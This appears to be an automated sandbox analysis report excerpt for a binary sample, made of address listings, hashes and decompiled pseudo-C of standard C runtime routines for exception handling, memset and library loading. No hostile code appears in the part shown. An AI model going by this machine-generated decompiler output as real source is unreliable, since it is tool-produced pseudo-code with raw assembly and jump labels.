                      0x0040397b
                      0x0040397e
                      0x00403983
                      0x0040398a
                      0x0040398f
                      0x00000000
                      0x004039c7
                      0x004039cf
                      0x00403a33
                      0x00403a33
                      0x00403a36
                      0x00403a39
                      0x00403a3b
                      0x00403a3e
                      0x00403a41
                      0x00403a47
                      0x00403bf3
                      0x00403bf3
                      0x00403bf6
                      0x00000000
                      0x00403bf8
                      0x00403bf8
                      0x00403bfb
                      0x00000000
                      0x00403c01
                      0x00403c01
                      0x00403c04
                      0x00403c07
                      0x00403c08
                      0x00403c09
                      0x00403c0c
                      0x00403c0d
                      0x00403c10
                      0x00403c11
                      0x00403c16
                      0x00000000
                      0x00403c16
                      0x00403bfb
                      0x00403a4d
                      0x00403a4d
                      0x00403a51
                      0x00000000
                      0x00403a57
                      0x00403a57
                      0x00403a5e
                      0x00403a76
                      0x00403a76
                      0x00403a79
                      0x00403a7c
                      0x00403a82
                      0x00403a92
                      0x00403a97
                      0x00403a9a
                      0x00403a9d
                      0x00403aa0
                      0x00403aa3
                      0x00403aa6
                      0x00403aa9
                      0x00403aaf
                      0x00403aaf
                      0x00403ab2
                      0x00403ab5
                      0x00403ac4
                      0x00403ac5
                      0x00403ac5
                      0x00403ac7
                      0x00403aca
                      0x00403ad0
                      0x00403ad3
                      0x00403ad9
                      0x00403adb
                      0x00403ade
                      0x00403ae1
                      0x00403ae7
                      0x00403aea
                      0x00403aef
                      0x00403aef
                      0x00403af2
                      0x00403af5
                      0x00403af8
                      0x00403afb
                      0x00403afe
                      0x00403b03
                      0x00403b04
                      0x00403b05
                      0x00403b06
                      0x00403b07
                      0x00403b0a
                      0x00403b0d
                      0x00403b0f
                      0x00000000
                      0x00403b11
                      0x00403b11
                      0x00403b11
                      0x00403b12
                      0x00403b14
                      0x00403b17
                      0x00403b18
                      0x00403b1d
                      0x00403b20
                      0x00403b22
                      0x00000000
                      0x00000000
                      0x00403b24
                      0x00403b27
                      0x00403b28
                      0x00403b2b
                      0x00403b2d
                      0x00000000
                      0x00403b2f
                      0x00403b2f
                      0x00403b32
                      0x00000000
                      0x00403b32
                      0x00000000
                      0x00403b2d
                      0x00403b46
                      0x00403b4c
                      0x00403b69
                      0x00403b6e
                      0x00403b6e
                      0x00403b71
                      0x00403b71
                      0x00000000
                      0x00403b35
                      0x00403b35
                      0x00403b36
                      0x00403b39
                      0x00403b3c
                      0x00403b3f
                      0x00403b3f
                      0x00000000
                      0x00403b44
                      0x00403ae1
                      0x00403ad3
                      0x00403b74
                      0x00403b77
                      0x00403b78
                      0x00403b7b
                      0x00403b7e
                      0x00403b81
                      0x00403b84
                      0x00403b84
                      0x00403b8d
                      0x00403b90
                      0x00403b90
                      0x00403aa9
                      0x00403b93
                      0x00403b97
                      0x00403b99
                      0x00403b9c
                      0x00403ba2
                      0x00403ba2
                      0x00403baa
                      0x00403baf
                      0x00403c19
                      0x00403c19
                      0x00403c1e
                      0x00403c22
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403bb1
                      0x00403bb4
                      0x00403bb7
                      0x00403bbb
                      0x00403bc9
                      0x00403bcb
                      0x00403be2
                      0x00403be6
                      0x00403bec
                      0x00403bed
                      0x00403bef
                      0x00000000
                      0x00403bf1
                      0x00000000
                      0x00403bf1
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403bbd
                      0x00403bbd
                      0x00403bbf
                      0x00000000
                      0x00403bc1
                      0x00403bc1
                      0x00403bc5
                      0x00000000
                      0x00403bc7
                      0x00403bcd
                      0x00403bd2
                      0x00403bd5
                      0x00403bda
                      0x00403bdd
                      0x00000000
                      0x00403bdd
                      0x00403bc5
                      0x00403bbf
                      0x00403bbb
                      0x00403a60
                      0x00403a60
                      0x00403a67
                      0x00000000
                      0x00403a69
                      0x00403a69
                      0x00403a70
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403a70
                      0x00403a67
                      0x00403a5e
                      0x00403a51
                      0x004039d1
                      0x004039d9
                      0x004039dc
                      0x004039e1
                      0x004039e5
                      0x004039e8
                      0x004039ee
                      0x004039f1
                      0x00000000
                      0x004039f3
                      0x004039f3
                      0x004039f6
                      0x004039f8
                      0x00403c29
                      0x00403c29
                      0x00000000
                      0x004039fe
                      0x00403a06
                      0x00403a11
                      0x00000000
                      0x00000000
                      0x00403a1a
                      0x00403a1d
                      0x00403a1e
                      0x00403a21
                      0x00403a23
                      0x00000000
                      0x00403a29
                      0x00000000
                      0x00403a29
                      0x00000000
                      0x00403a23
                      0x004039fe
                      0x00403c2e
                      0x00403c2e
                      0x00403c30
                      0x00403c31
                      0x00403c38
                      0x00403c3b
                      0x00403c49
                      0x00403c4e
                      0x00403c53
                      0x00403c56
                      0x00403c5b
                      0x00403c5e
                      0x00403c61
                      0x00403c63
                      0x00403c65
                      0x00403c65
                      0x00403c6a
                      0x00403c76
                      0x00403c7c
                      0x00403c81
                      0x00403c84
                      0x00403c85
                      0x00000000
                      0x00403c85
                      0x004039f1
                      0x004039cf
                      0x0040398f
                      0x00403970
                      0x00403962
                      0x0040392e

                      APIs
                      • type_info::operator==.LIBVCRUNTIME ref: 00403A0A
                      • ___TypeMatch.LIBVCRUNTIME ref: 00403B18
                      • _UnwindNestedFrames.LIBCMT ref: 00403C6A
                      • CallUnexpected.LIBVCRUNTIME ref: 00403C85
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_rnixgfly.jbxd
                      Yara matches
                      Similarity
                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                      • String ID: csm$csm$csm
                      • API String ID: 2751267872-393685449
                      • Opcode ID: d2805ed157ee1a0de980ebf95ce551697e3ac2d298d2a0e6c6e08f639c5bac21
                      • Instruction ID: eb951dfd93c377336a0bd22ac6a7177933b6abc1ee62d3cbfcc6e570eabf6f1d
                      • Opcode Fuzzy Hash: d2805ed157ee1a0de980ebf95ce551697e3ac2d298d2a0e6c6e08f639c5bac21
                      • Instruction Fuzzy Hash: 00B17A75900209DFCF15DFA5C9819AEBBB8BF04316F14416BE8017B292C379EA51CF99
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 353 402310-402361 call 40d360 call 4022d0 call 402967 360 402363-402375 353->360 361 4023bd-4023c0 353->361 362 4023e0-4023e9 360->362 364 402377-40238e 360->364 361->362 363 4023c2-4023cf call 402950 361->363 370 4023d4-4023dd call 4022d0 363->370 365 402390-40239e call 4028f0 364->365 366 4023a4 364->366 374 4023a0 365->374 375 4023b4-4023bb 365->375 369 4023a7-4023ac 366->369 369->364 372 4023ae-4023b0 369->372 370->362 372->362 376 4023b2 372->376 378 4023a2 374->378 379 4023ea-4023f3 374->379 375->370 376->370 378->369 380 4023f5-4023fc 379->380 381 40242d-40243d call 402930 379->381 380->381 382 4023fe-40240d call 40d1f0 380->382 387 402451-40246f call 4022d0 call 402910 381->387 388 40243f-40244e call 402950 381->388 391 40242a 382->391 392 40240f-402427 382->392 388->387 391->381 392->391
                      C-Code - Quality: 53%
                      			E00402310(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                      				char _v5;
                      				signed int _v12;
                      				char _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				signed int _v32;
                      				signed char _v36;
                      				void* _v40;
                      				signed int _t77;
                      				signed int _t84;
                      				intOrPtr _t85;
                      				void* _t86;
                      				intOrPtr* _t87;
                      				intOrPtr _t89;
                      				signed int _t91;
                      				int _t93;
                      				signed int _t98;
                      				intOrPtr* _t102;
                      				intOrPtr _t103;
                      				signed int _t107;
                      				char _t109;
                      				signed int _t113;
                      				void* _t114;
                      				intOrPtr _t123;
                      				void* _t125;
                      				intOrPtr _t133;
                      				signed int _t135;
                      				void* _t139;
                      				void* _t141;
                      				void* _t149;
                      
                      				_t118 = __edx;
                      				_t102 = _a4;
                      				_push(__edi);
                      				_v5 = 0;
                      				_v16 = 1;
                      				 *_t102 = E0040D360(__ecx,  *_t102);
                      				_t103 = _a8;
                      				_t6 = _t103 + 0x10; // 0x11
                      				_t133 = _t6;
                      				_push(_t133);
                      				_v20 = _t133;
                      				_v12 =  *(_t103 + 8) ^  *0x415010;
                      				E004022D0(_t103, __edx, __edi, _t133,  *(_t103 + 8) ^  *0x415010);
                      				E00402967(_a12);
                      				_t77 = _a4;
                      				_t141 = _t139 - 0x1c + 0x10;
                      				_t123 =  *((intOrPtr*)(_t103 + 0xc));
                      				if(( *(_t77 + 4) & 0x00000066) != 0) {
                      					__eflags = _t123 - 0xfffffffe;
                      					if(_t123 != 0xfffffffe) {
                      						_t118 = 0xfffffffe;
                      						E00402950(_t103, 0xfffffffe, _t133, 0x415010);
                      						goto L13;
                      					}
                      					goto L14;
                      				} else {
                      					_v32 = _t77;
                      					_v28 = _a12;
                      					 *((intOrPtr*)(_t103 - 4)) =  &_v32;
                      					if(_t123 == 0xfffffffe) {
                      						L14:
                      						return _v16;
                      					} else {
                      						do {
                      							_t107 = _v12;
                      							_t84 = _t123 + (_t123 + 2) * 2;
                      							_t103 =  *((intOrPtr*)(_t107 + _t84 * 4));
                      							_t85 = _t107 + _t84 * 4;
                      							_t108 =  *((intOrPtr*)(_t85 + 4));
                      							_v24 = _t85;
                      							if( *((intOrPtr*)(_t85 + 4)) == 0) {
                      								_t109 = _v5;
                      								goto L7;
                      							} else {
                      								_t118 = _t133;
                      								_t86 = E004028F0(_t108, _t133);
                      								_t109 = 1;
                      								_v5 = 1;
                      								_t149 = _t86;
                      								if(_t149 < 0) {
                      									_v16 = 0;
                      									L13:
                      									_push(_t133);
                      									E004022D0(_t103, _t118, _t123, _t133, _v12);
                      									goto L14;
                      								} else {
                      									if(_t149 > 0) {
                      										_t87 = _a4;
                      										__eflags =  *_t87 - 0xe06d7363;
                      										if( *_t87 == 0xe06d7363) {
                      											__eflags =  *0x40e1c4;
                      											if(__eflags != 0) {
                      												_t98 = E0040D1F0(__eflags, "<&@");
                      												_t141 = _t141 + 4;
                      												__eflags = _t98;
                      												if(_t98 != 0) {
                      													_t135 =  *0x40e1c4; // 0x40263c
                      													 *0x40e160(_a4, 1);
                      													 *_t135();
                      													_t133 = _v20;
                      													_t141 = _t141 + 8;
                      												}
                      												_t87 = _a4;
                      											}
                      										}
                      										_t119 = _t87;
                      										E00402930(_t87, _a8, _t87);
                      										_t89 = _a8;
                      										__eflags =  *((intOrPtr*)(_t89 + 0xc)) - _t123;
                      										if( *((intOrPtr*)(_t89 + 0xc)) != _t123) {
                      											_t119 = _t123;
                      											E00402950(_t89, _t123, _t133, 0x415010);
                      											_t89 = _a8;
                      										}
                      										_push(_t133);
                      										 *((intOrPtr*)(_t89 + 0xc)) = _t103;
                      										E004022D0(_t103, _t119, _t123, _t133, _v12);
                      										E00402910();
                      										asm("int3");
                      										asm("int3");
                      										asm("int3");
                      										_t113 = _v32;
                      										_t91 = _v36 & 0x000000ff;
                      										_t125 = _v40;
                      										__eflags = _t113;
                      										if(_t113 == 0) {
                      											L46:
                      											return _v40;
                      										} else {
                      											_t93 = _t91 * 0x1010101;
                      											__eflags = _t113 - 0x20;
                      											if(_t113 <= 0x20) {
                      												L39:
                      												__eflags = _t113 & 0x00000003;
                      												while((_t113 & 0x00000003) != 0) {
                      													 *_t125 = _t93;
                      													_t125 = _t125 + 1;
                      													_t113 = _t113 - 1;
                      													__eflags = _t113 & 0x00000003;
                      												}
                      												__eflags = _t113 & 0x00000004;
                      												if((_t113 & 0x00000004) != 0) {
                      													 *_t125 = _t93;
                      													_t125 = _t125 + 4;
                      													_t113 = _t113 - 4;
                      													__eflags = _t113;
                      												}
                      												__eflags = _t113 & 0xfffffff8;
                      												while((_t113 & 0xfffffff8) != 0) {
                      													 *_t125 = _t93;
                      													 *(_t125 + 4) = _t93;
                      													_t125 = _t125 + 8;
                      													_t113 = _t113 - 8;
                      													__eflags = _t113 & 0xfffffff8;
                      												}
                      												goto L46;
                      											} else {
                      												__eflags = _t113 - 0x80;
                      												if(__eflags < 0) {
                      													L33:
                      													asm("bt dword [0x415030], 0x1");
                      													if(__eflags >= 0) {
                      														goto L39;
                      													} else {
                      														asm("movd xmm0, eax");
                      														asm("pshufd xmm0, xmm0, 0x0");
                      														goto L35;
                      													}
                      												} else {
                      													asm("bt dword [0x415c68], 0x1");
                      													if(__eflags >= 0) {
                      														asm("bt dword [0x415030], 0x1");
                      														if(__eflags >= 0) {
                      															goto L39;
                      														} else {
                      															asm("movd xmm0, eax");
                      															asm("pshufd xmm0, xmm0, 0x0");
                      															_t114 = _t125 + _t113;
                      															asm("movups [edi], xmm0");
                      															_t125 = _t125 + 0x00000010 & 0xfffffff0;
                      															_t113 = _t114 - _t125;
                      															__eflags = _t113 - 0x80;
                      															if(__eflags <= 0) {
                      																goto L33;
                      															} else {
                      																do {
                      																	asm("movdqa [edi], xmm0");
                      																	asm("movdqa [edi+0x10], xmm0");
                      																	asm("movdqa [edi+0x20], xmm0");
                      																	asm("movdqa [edi+0x30], xmm0");
                      																	asm("movdqa [edi+0x40], xmm0");
                      																	asm("movdqa [edi+0x50], xmm0");
                      																	asm("movdqa [edi+0x60], xmm0");
                      																	asm("movdqa [edi+0x70], xmm0");
                      																	_t125 = _t125 + 0x80;
                      																	_t113 = _t113 - 0x80;
                      																	__eflags = _t113 & 0xffffff00;
                      																} while ((_t113 & 0xffffff00) != 0);
                      																L35:
                      																__eflags = _t113 - 0x20;
                      																if(_t113 < 0x20) {
                      																	L38:
                      																	asm("movdqu [edi], xmm0");
                      																	asm("movdqu [edi+0x10], xmm0");
                      																	return _v40;
                      																} else {
                      																	do {
                      																		asm("movdqu [edi], xmm0");
                      																		asm("movdqu [edi+0x10], xmm0");
                      																		_t125 = _t125 + 0x20;
                      																		_t113 = _t113 - 0x20;
                      																		__eflags = _t113 - 0x20;
                      																	} while (_t113 >= 0x20);
                      																	__eflags = _t113 & 0x0000001f;
                      																	if((_t113 & 0x0000001f) == 0) {
                      																		goto L46;
                      																	} else {
                      																		goto L38;
                      																	}
                      																}
                      															}
                      														}
                      													} else {
                      														memset(_t125, _t93, _t113 << 0);
                      														return _v40;
                      													}
                      												}
                      											}
                      										}
                      									} else {
                      										goto L7;
                      									}
                      								}
                      							}
                      							goto L47;
                      							L7:
                      							_t123 = _t103;
                      						} while (_t103 != 0xfffffffe);
                      						if(_t109 != 0) {
                      							goto L13;
                      						}
                      						goto L14;
                      					}
                      				}
                      				L47:
                      			}


































                      0x00402310
                      0x00402317
                      0x0040231b
                      0x0040231c
                      0x00402322
                      0x0040232e
                      0x00402330
                      0x00402336
                      0x00402336
                      0x0040233f
                      0x00402341
                      0x00402344
                      0x00402347
                      0x0040234f
                      0x00402354
                      0x00402357
                      0x0040235a
                      0x00402361
                      0x004023bd
                      0x004023c0
                      0x004023c8
                      0x004023cf
                      0x00000000
                      0x004023cf
                      0x00000000
                      0x00402363
                      0x00402363
                      0x00402369
                      0x0040236f
                      0x00402375
                      0x004023e0
                      0x004023e9
                      0x00402377
                      0x00402377
                      0x00402377
                      0x0040237d
                      0x00402380
                      0x00402383
                      0x00402386
                      0x00402389
                      0x0040238e
                      0x004023a4
                      0x00000000
                      0x00402390
                      0x00402390
                      0x00402392
                      0x00402397
                      0x00402399
                      0x0040239c
                      0x0040239e
                      0x004023b4
                      0x004023d4
                      0x004023d4
                      0x004023d8
                      0x00000000
                      0x004023a0
                      0x004023a0
                      0x004023ea
                      0x004023ed
                      0x004023f3
                      0x004023f5
                      0x004023fc
                      0x00402403
                      0x00402408
                      0x0040240b
                      0x0040240d
                      0x0040240f
                      0x0040241c
                      0x00402422
                      0x00402424
                      0x00402427
                      0x00402427
                      0x0040242a
                      0x0040242a
                      0x004023fc
                      0x00402430
                      0x00402432
                      0x00402437
                      0x0040243a
                      0x0040243d
                      0x00402445
                      0x00402449
                      0x0040244e
                      0x0040244e
                      0x00402451
                      0x00402455
                      0x00402458
                      0x00402468
                      0x0040246d
                      0x0040246e
                      0x0040246f
                      0x00402470
                      0x00402474
                      0x0040247b
                      0x0040247f
                      0x00402481
                      0x004025c3
                      0x004025c9
                      0x00402487
                      0x00402487
                      0x0040248d
                      0x00402490
                      0x00402575
                      0x00402575
                      0x0040257b
                      0x0040257d
                      0x0040257f
                      0x00402580
                      0x00402583
                      0x00402583
                      0x0040258b
                      0x00402591
                      0x00402593
                      0x00402595
                      0x00402598
                      0x00402598
                      0x00402598
                      0x0040259b
                      0x004025a1
                      0x004025b0
                      0x004025b2
                      0x004025b5
                      0x004025b8
                      0x004025bb
                      0x004025bb
                      0x00000000
                      0x00402496
                      0x00402496
                      0x0040249c
                      0x0040252d
                      0x0040252d
                      0x00402535
                      0x00000000
                      0x00402537
                      0x00402537
                      0x0040253b
                      0x00000000
                      0x0040253b
                      0x004024a2
                      0x004024a2
                      0x004024aa
                      0x004024b5
                      0x004024bd
                      0x00000000
                      0x004024c3
                      0x004024c3
                      0x004024c7
                      0x004024cc
                      0x004024ce
                      0x004024d4
                      0x004024d7
                      0x004024d9
                      0x004024df
                      0x00000000
                      0x004024f0
                      0x004024f0
                      0x004024f0
                      0x004024f4
                      0x004024f9
                      0x004024fe
                      0x00402503
                      0x00402508
                      0x0040250d
                      0x00402512
                      0x00402517
                      0x0040251d
                      0x00402523
                      0x00402523
                      0x00402540
                      0x00402540
                      0x00402543
                      0x00402561
                      0x00402565
                      0x00402569
                      0x00402574
                      0x00402545
                      0x00402545
                      0x00402545
                      0x00402549
                      0x0040254e
                      0x00402551
                      0x00402554
                      0x00402554
                      0x00402559
                      0x0040255f
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040255f
                      0x00402543
                      0x004024df
                      0x004024ac
                      0x004024ac
                      0x004024b4
                      0x004024b4
                      0x004024aa
                      0x0040249c
                      0x00402490
                      0x004023a2
                      0x00000000
                      0x004023a2
                      0x004023a0
                      0x0040239e
                      0x00000000
                      0x004023a7
                      0x004023a7
                      0x004023a9
                      0x004023b0
                      0x00000000
                      0x004023b2
                      0x00000000
                      0x004023b0
                      0x00402375
                      0x00000000

                      APIs
                      • _ValidateLocalCookies.LIBCMT ref: 00402347
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0040234F
                      • _ValidateLocalCookies.LIBCMT ref: 004023D8
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00402403
                      • _ValidateLocalCookies.LIBCMT ref: 00402458
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_rnixgfly.jbxd
                      Yara matches
                      Similarity
                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                      • String ID: <&@$csm
                      • API String ID: 1170836740-4289465445
                      • Opcode ID: 62bc818260f3d61d15a3a2816a247d7c989dff70b0980e5c6bc77aebcd7fc6d4
                      • Instruction ID: e86dbd8585806dd5d23d3718c6f18d027200fadb66ce12341b0a8af8e769dc64
                      • Opcode Fuzzy Hash: 62bc818260f3d61d15a3a2816a247d7c989dff70b0980e5c6bc77aebcd7fc6d4
                      • Instruction Fuzzy Hash: EF41D734A002199BCF10DF69C988A9EBBB0AF44314F14807AED14BB3D2D7B9DA55CB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004082D3(void* __ecx, signed int* _a4, intOrPtr _a8) {
                      				signed int _v8;
                      				void* _t20;
                      				void* _t22;
                      				WCHAR* _t26;
                      				signed int _t29;
                      				void** _t30;
                      				signed int* _t35;
                      				void* _t38;
                      				void* _t40;
                      
                      				_t35 = _a4;
                      				while(_t35 != _a8) {
                      					_t29 =  *_t35;
                      					_v8 = _t29;
                      					_t38 =  *(0x416300 + _t29 * 4);
                      					if(_t38 == 0) {
                      						_t26 =  *(0x40fa88 + _t29 * 4);
                      						_t38 = LoadLibraryExW(_t26, 0, 0x800);
                      						if(_t38 != 0) {
                      							L14:
                      							_t30 = 0x416300 + _v8 * 4;
                      							 *_t30 = _t38;
                      							if( *_t30 != 0) {
                      								FreeLibrary(_t38);
                      							}
                      							L16:
                      							_t20 = _t38;
                      							L13:
                      							return _t20;
                      						}
                      						_t22 = GetLastError();
                      						if(_t22 != 0x57) {
                      							L9:
                      							 *(0x416300 + _v8 * 4) = _t22 | 0xffffffff;
                      							L10:
                      							_t35 =  &(_t35[1]);
                      							continue;
                      						}
                      						_t22 = E00405A18(_t26, L"api-ms-", 7);
                      						_t40 = _t40 + 0xc;
                      						if(_t22 == 0) {
                      							goto L9;
                      						}
                      						_t22 = E00405A18(_t26, L"ext-ms-", 7);
                      						_t40 = _t40 + 0xc;
                      						if(_t22 == 0) {
                      							goto L9;
                      						}
                      						_t22 = LoadLibraryExW(_t26, _t38, _t38);
                      						_t38 = _t22;
                      						if(_t38 != 0) {
                      							goto L14;
                      						}
                      						goto L9;
                      					}
                      					if(_t38 != 0xffffffff) {
                      						goto L16;
                      					}
                      					goto L10;
                      				}
                      				_t20 = 0;
                      				goto L13;
                      			}












                      0x004082dc
                      0x00408371
                      0x004082e4
                      0x004082e6
                      0x004082f0
                      0x004082f5
                      0x00408302
                      0x00408317
                      0x0040831b
                      0x00408381
                      0x00408386
                      0x0040838d
                      0x00408391
                      0x00408394
                      0x00408394
                      0x0040839a
                      0x0040839a
                      0x0040837c
                      0x00408380
                      0x00408380
                      0x0040831d
                      0x00408326
                      0x0040835f
                      0x0040836c
                      0x0040836e
                      0x0040836e
                      0x00000000
                      0x0040836e
                      0x00408330
                      0x00408335
                      0x0040833a
                      0x00000000
                      0x00000000
                      0x00408344
                      0x00408349
                      0x0040834e
                      0x00000000
                      0x00000000
                      0x00408353
                      0x00408359
                      0x0040835d
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040835d
                      0x004082fa
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00408300
                      0x0040837a
                      0x00000000

                      APIs
                      • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,B1AB4D46,?,004083E2,00000002,00000000,00000000), ref: 00408394
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_rnixgfly.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeLibrary
                      • String ID: api-ms-$ext-ms-
                      • API String ID: 3664257935-537541572
                      • Opcode ID: c9283d596dd430a65ff98e794139049b5b5b47e480c88dd665e719789acae378
                      • Instruction ID: 573f1ada4d3828c880b6c39e4f7b2ce1dfde6baafd70aff868d57e190d54574b
                      • Opcode Fuzzy Hash: c9283d596dd430a65ff98e794139049b5b5b47e480c88dd665e719789acae378
                      • Instruction Fuzzy Hash: F1212B32A00221EBC7219B229D40A9F3368EB81B60F25053AED55B73D0DF79ED01CADD
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 82%
                      			E004029C1(void* __ecx) {
                      				void* _t8;
                      				void* _t11;
                      				void* _t13;
                      				void* _t14;
                      				void* _t18;
                      				void* _t23;
                      				long _t24;
                      				void* _t27;
                      
                      				_t13 = __ecx;
                      				if( *0x415040 != 0xffffffff) {
                      					_t24 = GetLastError();
                      					_t11 = E00402CA4(_t13,  *0x415040);
                      					_t14 = _t23;
                      					if(_t11 == 0xffffffff) {
                      						L5:
                      						_t11 = 0;
                      					} else {
                      						if(_t11 == 0) {
                      							if(E00402CDF(_t14,  *0x415040, 0xffffffff) != 0) {
                      								_push(0x28);
                      								_t27 = E004057DE();
                      								_t18 = 1;
                      								if(_t27 == 0) {
                      									L8:
                      									_t11 = 0;
                      									E00402CDF(_t18,  *0x415040, 0);
                      								} else {
                      									_t8 = E00402CDF(_t18,  *0x415040, _t27);
                      									_pop(_t18);
                      									if(_t8 != 0) {
                      										_t11 = _t27;
                      										_t27 = 0;
                      									} else {
                      										goto L8;
                      									}
                      								}
                      								E0040571A(_t27);
                      							} else {
                      								goto L5;
                      							}
                      						}
                      					}
                      					SetLastError(_t24);
                      					return _t11;
                      				} else {
                      					return 0;
                      				}
                      			}











                      0x004029c1
                      0x004029c8
                      0x004029db
                      0x004029e2
                      0x004029e4
                      0x004029e8
                      0x00402a01
                      0x00402a01
                      0x004029ea
                      0x004029ec
                      0x004029ff
                      0x00402a06
                      0x00402a0f
                      0x00402a12
                      0x00402a15
                      0x00402a29
                      0x00402a29
                      0x00402a32
                      0x00402a17
                      0x00402a1e
                      0x00402a24
                      0x00402a27
                      0x00402a3b
                      0x00402a3d
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00402a27
                      0x00402a40
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004029ff
                      0x004029ec
                      0x00402a48
                      0x00402a52
                      0x004029ca
                      0x004029cc
                      0x004029cc

                      APIs
                      • GetLastError.KERNEL32(?,?,004029B8,004027E8,00401E66), ref: 004029CF
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004029DD
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004029F6
                      • SetLastError.KERNEL32(00000000,004029B8,004027E8,00401E66), ref: 00402A48
                      Memory Dump Source
                      • Source File: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_rnixgfly.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: 70247efa9ed0a105f5c3cc4c9e138fb419d640718360533235fe7f9ad7db5892
                      • Instruction ID: 078a338927bebc8a57084cdf0b2594a36b0b0cb36656b2d2252d312e3d5e2cf0
                      • Opcode Fuzzy Hash: 70247efa9ed0a105f5c3cc4c9e138fb419d640718360533235fe7f9ad7db5892
                      • Instruction Fuzzy Hash: FA012832308A119EE63566B9AE8D5AB2F44EB45338B20023FF510755E1EFFD4C01699C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 25%
                      			E00404F84(intOrPtr _a4) {
                      				char _v16;
                      				signed int _v20;
                      				signed int _t11;
                      				int _t14;
                      				void* _t16;
                      				void* _t20;
                      				int _t22;
                      				signed int _t23;
                      
                      				_t11 =  *0x415010; // 0xb1ab4d46
                      				 *[fs:0x0] =  &_v16;
                      				_v20 = _v20 & 0x00000000;
                      				_t14 =  &_v20;
                      				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], 0x40d42f, 0xffffffff);
                      				if(_t14 != 0) {
                      					_t14 = GetProcAddress(_v20, "CorExitProcess");
                      					_t22 = _t14;
                      					if(_t22 != 0) {
                      						 *0x40e160(_a4);
                      						_t14 =  *_t22();
                      					}
                      				}
                      				if(_v20 != 0) {
                      					_t14 = FreeLibrary(_v20);
                      				}
                      				 *[fs:0x0] = _v16;
                      				return _t14;
                      			}











                      0x00404f99
                      0x00404fa4
                      0x00404faa
                      0x00404fae
                      0x00404fb9
                      0x00404fc1
                      0x00404fcb
                      0x00404fd1
                      0x00404fd5
                      0x00404fdc
                      0x00404fe2
                      0x00404fe2
                      0x00404fd5
                      0x00404fe8
                      0x00404fed
                      0x00404fed
                      0x00404ff6
                      0x00405000

                      APIs
                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,B1AB4D46,?,?,00000000,0040D42F,000000FF,?,00404F60,00000002,?,00404F34,004057DD), ref: 00404FB9
                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00404FCB
                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,0040D42F,000000FF,?,00404F60,00000002,?,00404F34,004057DD), ref: 00404FED
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_rnixgfly.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressFreeHandleLibraryModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 4061214504-1276376045
                      • Opcode ID: 44008817a766496d30a0b71b405d55bf33a24efc73ce07632b22a39922047233
                      • Instruction ID: f45cf89818bd8daf17f7f5fa5db09656c02fb6dca8b021926776a3611c212177
                      • Opcode Fuzzy Hash: 44008817a766496d30a0b71b405d55bf33a24efc73ce07632b22a39922047233
                      • Instruction Fuzzy Hash: 1101A771914626EBDB119F51DC05FAEBBB8FB44715F00493AE811B22D0DBB89900CB54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 58%
                      			E00409AC0(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                      				signed int _v8;
                      				intOrPtr _v12;
                      				void* _v24;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t40;
                      				intOrPtr _t45;
                      				signed int _t48;
                      				void* _t51;
                      				signed int _t55;
                      				intOrPtr _t64;
                      				intOrPtr _t69;
                      				void* _t72;
                      				intOrPtr _t73;
                      				intOrPtr _t89;
                      				void* _t90;
                      				intOrPtr* _t92;
                      				void* _t94;
